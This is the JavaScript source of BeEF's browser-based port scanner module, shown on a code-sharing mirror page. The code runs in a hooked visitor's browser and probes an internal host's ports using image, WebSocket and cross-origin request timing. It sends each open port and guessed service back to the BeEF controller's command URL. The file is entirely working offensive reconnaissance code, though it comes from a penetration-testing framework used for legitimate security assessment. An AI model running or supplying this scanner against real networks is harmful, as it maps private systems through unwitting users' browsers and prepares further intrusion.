Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
beefproject
GitHub Repository: beefproject/beef
 Path: blob/master/modules/network/port_scanner/command.js
1873 views
1
//

2
// Copyright (c) 2006-2026Wade Alcorn - [email protected]

3
// Browser Exploitation Framework (BeEF) - https://beefproject.com

4
// See the file 'doc/COPYING' for copying permission

5
//

6


7


8
beef.execute(function() {

9


10
	var blocked_ports = [ 1, 7, 9, 11, 13, 15, 17, 19, 20, 21, 22, 23, 25, 37, 42, 43, 53, 77, 79, 87, 95, 101, 102, 103, 104, 109, 110, 111, 113, 115, 117, 119, 123, 135, 139, 143, 179, 389, 465, 512, 513, 514, 515, 526, 530, 531, 532, 540, 556, 563, 587, 601, 636, 993, 995, 2049, 3659, 4045, 6000, 6665, 6666, 6667, 6668, 6669, 65535 ];

11
	

12
	var default_ports = [ 1,5,7,9,15,20,21,22,23,25,26,29,33,37,42,43,53,67,68,69,70,76,79,80,88,90,98,101,106,109,110,111,113,114,115,118,119,123,129,132,133,135,136,137,138,139,143,144,156,158,161,162,168,174,177,194,197,209,213,217,219,220,223,264,315,316,346,353,389,413,414,415,416,440,443,444,445,453,454,456,457,458,462,464,465,466,480,486,497,500,501,516,518,522,523,524,525,526,533,535,538,540,541,542,543,544,545,546,547,556,557,560,561,563,564,625,626,631,636,637,660,664,666,683,740,741,742,744,747,748,749,750,751,752,753,754,758,760,761,762,763,764,765,767,771,773,774,775,776,780,781,782,783,786,787,799,800,801,808,871,873,888,898,901,953,989,990,992,993,994,995,996,997,998,999,1000,1002,1008,1023,1024,1080,8080,8443,8050,3306,5432,1521,1433,3389,10088 ];

13
	var default_services = {'1':'tcpmux', '5':'rje', '7':'echo', '9':'msn', '15':'netstat', '20':'ftp-data', '21':'ftp', '22':'ssh', '23':'telnet', '25':'smtp', '26':'rsftp', '29':'msgicp', '33':'dsp', '37':'time', '42':'nameserver', '43':'whois', '53':'domain', '67':'dhcps', '68':'dhcpc', '69':'tftp', '70':'gopher', '76':'deos', '79':'finger', '80':'http', '81':'hosts2-ns', '88':'kerberos-sec', '90':'dnsix', '98':'linuxconf', '101':'hostname', '106':'pop3pw', '109':'pop2', '110':'pop3', '111':'rpcbind', '113':'ident', '114':'audio news', '115':'sftp', '118':'sqlserv', '119':'nntp', '123':'ntp', '129':'pwdgen', '132':'cisco-sys', '133':'statsrv', '135':'msrpc', '136':'profile', '137':'netbios-ns', '138':'netbios-dgm', '139':'netbios-ssn', '143':'imap', '144':'news', '156':'sqlserv', '158':'pcmail-srv', '161':'snmp', '162':'snmp trap', '168':'rsvd', '174':'mailq', '177':'xdmcp', '194':'irc', '197':'dls', '199':'smux', '209':'tam', '213':'ipx', '217':'dbase', '219':'uarps', '220':'imap3', '223':'cdc', '264':'bgmp', '315':'dpsi', '316':'decauth', '346':'zserv', '353':'ndsauth', '389':'ldap', '413':'smsp', '414':'infoseek', '415':'bnet', '416':'silver platter', '440':'sgcp', '443':'https', '444':'snpp', '445':'microsoft-ds', '453':'creativeserver', '454':'content server', '456':'macon', '457':'scohelp', '458':'appleqtc', '462':'datasurfsrvsec', '464':'kpasswd5', '465':'smtps', '466':'digital-vrc', '480':'loadsrv', '486':'sstats', '497':'retrospect', '500':'isakmp', '501':'stmf', '515':'printer (spooler lpd)', '516':'videotex', '518':'ntalk', '522':'ulp', '523':'ibm-db2', '524':'ncp', '525':'timed', '526':'tempo', '533':'netwall', '535':'iiop', '538':'gdomap', '540':'uucp', '541':'uucp-rlogin', '542':'commerce', '543':'klogin', '544':'kshell', '545':'ekshell', '546':'dhcpconf', '547':'dhcpserv', '548':'afp', '556':'remotefs', '557':'openvms-sysipc', '560':'rmonitor', '561':'monitor', '563':'snews', '564':'9pfs', '587':'submission', '625':'apple-xsrvr-admin', '626':'apple-imap-admin', '631':'ipp', '636':'ldapssl', '637':'lanserver', '660':'mac-srvr-admin', '664':'secure-aux-bus', '666':'doom', '683':'corba-iiop', '740':'netcp', '741':'netgw', '742':'netrcs', '744':'flexlm', '747':'fujitsu-dev', '748':'ris-cm', '749':'kerberos-adm', '750':'kerberos', '751':'kerberos_master', '752':'qrh', '753':'rrh', '754':'krb_prop', '758':'nlogin', '760':'krbupdate', '761':'kpasswd', '762':'quotad', '763':'cycleserv', '764':'omserv', '765':'webster', '767':'phonebook', '771':'rtip', '773':'submit', '774':'rpasswd', '775':'entomb', '776':'wpages', '780':'wpgs', '781':'hp-collector', '782':'hp-managed-node', '783':'spam assassin', '786':'concert', '787':'qsc', '799':'controlit', '800':'mdbs_daemon', '801':'device', '808':'ccproxy-http', '871':'supfilesrv', '873':'rsync', '888':'access builder', '898':'sun-manageconsole', '901':'samba-swat', '953':'rndc', '989':'ftps-data', '990':'ftps', '992':'telnets', '993':'imaps', '994':'ircs', '995':'pop3s', '996':'xtreelic', '997':'maitrd', '998':'busboy', '999':'garcon', '1000':'cadlock', '1002':'windows-icfw', '1008':'ufsd', '1023':'netvenuechat', '1024':'kdm', '1025':'NFS-or-IIS', '1080':'socks', '1433':'mssql', '1434':'ms-sql-m', '1521 ':'oracle', '1720':'h323q931', '1723':'pptp', '3306':'mysql', '3389':'ms-wbt-server', '4489':'radmin', '5000':'upnp', '5060':'sip', '5432':'postgres', '5900':'vnc', '6000':'x11', '6001':'X11:1', '6446':'mysql-proxy', '8050':'coldfusion', '8080':'http-proxy', '8443':'tomcat', '8888':'sun-answerbook', '9100':'HP JetDirect card', '10000':'snet-sensor-mgmt', '10088':'zend server', '11371':'hkp'};

14


15
	// Top-ports according to Fyodor's NMAP-related research (nmap-services / open-frequency).

16
	//		default_services had been extended to contain below ports service names.

17
	// $ cat /usr/share/nmap/nmap-services | grep -vE "^#.+" | sort -r -k3 | grep "/tcp" | sed 's:/tcp::' | grep -v unknown | awk '{print $1" - "$2}'

18
	var top_ports = [80, 23, 443, 21, 22, 25, 3389, 110, 445, 139, 143, 53, 135, 3306, 8080, 1723, 111, 995, 993, 5900, 1025, 587, 8888, 199, 1720, 465, 548, 113, 81, 6001, 10000, 5060, 515, 5000, 9100];

19
	

20
	var host = '<%= @ipHost %>';

21
	// TODO: Adjust times for each browser

22
	var closetimeout = '<%= @closetimeout %>';

23
	var opentimeout = '<%= @opentimeout %>';

24
	var delay = '<%= @delay %>';

25
	var ports = '<%= @ports %>';

26
    	var debug = '<%= @debug %>';

27
	var protocol = 'ftp://';

28


29
	var start_time_ws = undefined;

30
	var start_time_cors = undefined;

31
	var start_time_http = undefined;

32
	var start_scan = undefined;

33
	var intID_http = undefined;

34
	var intID_ws = undefined;

35
	var intID_cors = undefined;

36


37
	var port = "";

38
	var ports_list= [];

39


40
	var timeval = parseInt(opentimeout) + parseInt(delay*2);

41
	var port_status_http = 0;

42
	var port_status_ws = 0;

43
	var port_status_cors = 0;

44
	// 0 : unknown

45
	// 1 : closed

46
	// 2 : open

47
	// 3 : timeout

48
	// 4 : blocked

49
	var process_port_http = false;

50
	var process_port_ws = false;

51
	var process_port_cors = false;

52
	var count = 0;

53


54
	var img_scan = undefined;

55
	var ws_scan = undefined;

56
	var cs_scan = undefined;

57
	var s = undefined;

58


59
	var debug_value = false; // It will show what status is the port for each method

60
    	if (debug == 'true')

61
	{

62
       		debug_value = true;

63
    	}

64


65
	function check_blocked(port_to_check)

66
	{

67
		var res = false;

68


69
		for (var i=0; i<blocked_ports.length; i++)

70
		{

71
			if (port_to_check == blocked_ports[i])

72
			{

73
				res = true;

74
			}

75
		}

76
	

77
		return res;

78
	}

79


80
	function prepare_ports()

81
	{

82
		if (ports == 'default') // Default ports to scan

83
		{

84
			// nmap most used ports to scan + some new ports

85
			for ( var i=0; i<default_ports.length; i++)

86
			{

87
				ports_list[i] = default_ports[i];

88
			}

89


90
		} else if (ports == 'top')	// Top-ports according to Fyodor's research

91
		{

92
			// nmap most used ports to scan + some new ports

93
			for ( var i=0; i<top_ports.length; i++)

94
			{

95
				ports_list[i] = top_ports[i];

96
			}

97


98
		} else 

99
		{ // Custom ports provided to scan

100
			if (ports.search(",") > 0) ports_list = ports.split(","); // list of ports

101
			else if (ports.search("-") > 0) 

102
			{

103
				var firstport = parseInt(ports.split("-")[0]); // range of ports, start

104
				var lastport = parseInt(ports.split("-")[1]); // range of ports, end

105
				var a = 0;

106
				for (var i = firstport; i<=lastport; i++)

107
				{

108
					ports_list[a] = firstport + a;

109
					a++;

110
				}

111
			} else ports_list = ports.split(); // single port

112
		}

113
	}

114


115
	function cors_scan(hostname, port_)

116
	{

117
		if (check_blocked(parseInt(port_)))

118
		{

119
			process_port_cors = true;

120
			port_status_cors = 4; // blocked

121
			if (debug_value){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'ip='+host+'&port=CORS: Port ' + port_ + ' is BLOCKED');}

122
			return;

123
		}

124


125
		//var interval = (new Date).getTime() - start_time_cors;

126


127
		cs_scan = new XMLHttpRequest();

128


129
            	cs_scan.open('GET', "http://" + hostname + ":" + port_, true);

130
            	cs_scan.send(null);

131


132
		intID_cors = setInterval(

133
		function ()

134
		{

135
			var interval = (new Date).getTime() - start_time_cors;

136
			if (process_port_cors) 

137
			{

138
				return;

139
			}

140


141
			if (cs_scan.readyState === 1) // CONNECTING

142
			{

143
			}

144


145
			if (cs_scan.readyState === 2) // OPEN

146
			{

147
			}

148


149
			if (cs_scan.readyState === 3) // CLOSING

150
			{

151
			}

152
	

153
			if (cs_scan.readyState === 4) // CLOSE

154
			{

155
				clearInterval(intID_cors);

156
				process_port_cors = true;

157
				if (interval < closetimeout)

158
				{

159
					port_status_cors =  1; // closed

160
					if (debug_value){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'ip='+host+'&port=CORS: Port ' + port_ + ' is CLOSED');}

161
				} else 

162
				{

163
					port_status_cors = 2; // open

164
					var known_service = "";

165
					if (port_ in default_services) 

166
					{

167
						known_service = "(" + default_services[port_] + ")";

168
					}

169
					beef.net.send('<%= @command_url %>', <%= @command_id %>, 'ip='+host+'&port=CORS: Port ' + port_ + ' is OPEN ' + known_service, beef.are.status_success());

170
				}

171
			}

172


173
			if (interval >= opentimeout)

174
			{

175
				clearInterval(intID_cors);

176
				process_port_cors = true;

177
				port_status_cors = 3; // timeout

178
				if (debug_value){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'ip='+host+'&port=CORS: Port ' + port_ + ' is TIMEOUT');}

179
			}	

180
			return;	

181
		}

182
		, 1);

183
	}

184


185
	function websocket_scan(hostname, port_)

186
	{

187
		if (check_blocked(parseInt(port_)))

188
		{

189
			process_port_ws = true;

190
			port_status_ws = 4; // blocked

191
			if (debug_value){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'ip='+host+'&port=WebSocket: Port ' + port_ + ' is BLOCKED');}

192
			return;

193
		}

194


195
		if ("WebSocket" in window)

196
		{

197
			ws_scan = new WebSocket("ws://" + hostname + ":" + port_);

198
		}

199
		if ("MozWebSocket" in window)

200
		{

201
			ws_scan = new MozWebSocket("ws://" + hostname + ":" + port_);

202
		}

203


204
		//var interval = (new Date).getTime() - start_time_ws;

205


206
		intID_ws = setInterval(

207
		function ()

208
		{

209
			var interval = (new Date).getTime() - start_time_ws;

210


211
			if (process_port_ws) 

212
			{

213
				clearInterval(intID_ws);

214
				return;

215
			}

216


217
			if (ws_scan.readyState === 0) // CONNECTING

218
			{

219
			}

220


221
			if (ws_scan.readyState === 1) // OPEN

222
			{

223
				// TODO: Detect WebSockets server running

224
			}

225


226
			if (ws_scan.readyState === 2) // CLOSING

227
			{

228
			}

229
	

230
			if (ws_scan.readyState === 3) // CLOSE

231
			{

232
				clearInterval(intID_ws);

233
				process_port_ws = true;

234
				if (interval < closetimeout)

235
				{

236
					port_status_ws =  1; // closed

237
					if (debug_value){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'ip='+host+'&port=WebSocket: Port ' + port_ + ' is CLOSED');}

238
				} else 

239
				{

240
					port_status_ws = 2; // open

241
					var known_service = "";

242
					if (port_ in default_services) 

243
					{

244
						known_service = "(" + default_services[port_] + ")";

245
					}

246
					beef.net.send('<%= @command_url %>', <%= @command_id %>, 'ip='+host+'&port=WebSocket: Port ' + port_ + ' is OPEN ' + known_service);

247
				}

248
				ws_scan.close();

249
			}

250


251
			if (interval >= opentimeout)

252
			{

253
				clearInterval(intID_ws);

254
				process_port_ws = true;

255
				port_status_ws = 3; // timeout

256
				if (debug_value){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'ip='+host+'&port=WebSocket: Port ' + port_ + ' is TIMEOUT');}

257
				ws_scan.close();		

258
			}	

259
			return;	

260
		}

261
		, 1);

262
	}

263


264
	function http_scan(protocol_, hostname, port_)

265
	{

266
		//process_port_http = false;

267


268
		img_scan = new Image();

269


270
		img_scan.onerror = function(evt) 

271
		{

272
			var interval = (new Date).getTime() - start_time_http;

273
		

274
			if (interval < closetimeout)

275
			{

276
				if (process_port_http == false)

277
				{

278
					port_status_http = 1; // closed

279
					if (debug_value){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'ip='+host+'&port=HTTP: Port ' + port_ + ' is CLOSED');}

280
					clearInterval(intID_http);

281
				}

282
				process_port_http = true;

283
			}

284
		};

285


286
		img_scan.onload = img_scan.onerror;

287


288
		img_scan.src = protocol_ + hostname + ":" + port_;

289
		

290
		intID_http = setInterval(

291
		function ()

292
		{

293
			var interval = (new Date).getTime() - start_time_http;

294
	

295
			if (interval >= opentimeout)

296
			{

297
				if (!img_scan) return;

298
				//img_scan.src = "";

299
				img_scan = undefined;

300


301
				if (process_port_http == false)

302
				{

303
					port_status_http = 2; // open

304
					process_port_http = true;

305
				}

306
				clearInterval(intID_http);

307
				var known_service = "";

308
				if (port_ in default_services) 

309
				{

310
					known_service = "(" + default_services[port_] + ")";

311
				}

312
				beef.net.send('<%= @command_url %>', <%= @command_id %>, 'ip='+host+'&port=HTTP: Port ' + port_ + ' is OPEN ' + known_service);

313
			}

314
		}

315
		, 1);

316
	}

317


318
	prepare_ports();

319


320
	if (ports_list.length < 1)

321
	{

322
		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'port=Scan aborted, no valid ports provided to scan');

323
		return;

324
	} else 

325
	{

326
		desc = '';

327
		if (ports == 'default' || ports == 'top') {

328
			desc = ports + ' ports on ';

329
		} 

330
		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'port=Scanning ' + desc + host+' [ports: ' + ports_list + ']');

331
	}

332
	

333
	count = 0;

334
	start_scan = (new Date).getTime();

335


336
	s =  setInterval(

337
	

338
	function() 

339
	{

340
		if(count < ports_list.length)

341
		{

342
			start_time_cors = (new Date).getTime();

343
			cors_scan(host, ports_list[count]);

344
			start_time_ws = (new Date).getTime();

345
			websocket_scan(host, ports_list[count]);

346
			start_time_http = (new Date).getTime();

347
			http_scan(protocol, host, ports_list[count]);

348
    		}

349
		

350
    		count++;

351
		port_status_http = 0; // unknown

352
		process_port_http = false;

353
		port_status_ws = 0; // unknown

354
		process_port_ws = false;

355
		port_status_cors = 0; // unknown

356
		process_port_cors = false;

357


358
    		if(count >= ports_list.length) 

359
		{ 

360
			clearInterval(s);

361
			var interval = (new Date).getTime() - start_scan;

362
			setTimeout(function() { beef.net.send('<%= @command_url %>', <%= @command_id %>, 'Scan Finished in ' + interval + ' ms'); }, opentimeout*2);

363
		}

364
	}

365
	,timeval);

366


367
});

368


369


370